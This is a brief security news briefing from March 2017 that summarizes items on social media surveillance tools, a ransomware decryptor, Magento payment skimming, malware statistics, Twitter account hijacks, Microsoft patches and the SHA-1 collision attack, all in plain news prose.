Security Briefing 3.15.17
On Monday, Facebook, which owns Instagram, announced that it had updated its rules to clearly explain that developers can’t “use data obtained from us to provide tools that are used for surveillance”. In October, the American Civil Liberties Union (ACLU) published a report about police monitoring of activists and protesters with one particular app – called Geofeedia – that had been tapping into Twitter, Facebook and Instagram APIs to create real-time maps of social media activity in protest areas. Those maps have been used to identify, and in some cases arrest, protesters shortly after their posts became public.
Is Mentorship the Key to Recruiting Women to Cybersecurity? A new ISACA survey identifies biggest barriers faced by women in tech, chief of which are a lack of mentors and female role models. Topping the list is a lack of mentors, cited by 48% of participants. Another 42% of respondents cited a lack of female role models, and 39% said gender bias in the workplace stood as the second and third top barrier.
macOS users who had their systems infected with the FindZip ransomware can now use a decryption tool to restore their files without paying the ransom. A link to the decryption tool is here. This ransomware was spotted in the wild early last month.
Cybercriminals have been abusing a payment module to steal credit card data from online shops powered by the Magento ecommerce platform, web security firm Sucuri reported on Friday. The targeted module is the Realex Payments Magento extension (SF9). The extension itself is not vulnerable, but hackers added a malicious function called sendCcNumber() to an SF9 file named Remote.php that abuses the way the extension operates and sends CC info to an email address owned by the hackers.
The number of new malware variants that emerged in February 2017 was three times higher compared to January, nearly reaching the record-high levels registered in October 2016, Symantec reports. Last month the security company registered 94.1 million malware variants, which marks a worrying increase when compared to the 32.9 million seen in January and only 19.5 million in December.
Many high-profile Twitter accounts have been hijacked in an attack apparently motivated by the recent diplomatic dispute between Turkey and the Netherlands, including ones belonging to high profile organizations such as Amnesty International, the European Parliament, Duke University, UNICEF USA, Forbes, Reuters Japan, and BBC North America. The tweets were in Turkish referencing Nazi Germany. Most have had their accounts restored.
Microsoft has released a total of 18 security bulletins to address tens of vulnerabilities, including more than a dozen that have already been publicly disclosed or exploited in attacks. The March 2017 updates also include the patches that should have been released last month. Microsoft postponed most of the February security updates – except the updates that fixed Flash Player flaws – due to an unspecified “last minute issue.”
It took Google 2 years in conjunction with the Netherlands’ National Research Institute for Mathematics and Computer Science, but they successfully attacked the SHA-1 cryptographic algorithm. This is a widely used encryption protocol. Like, wiiiiiidely.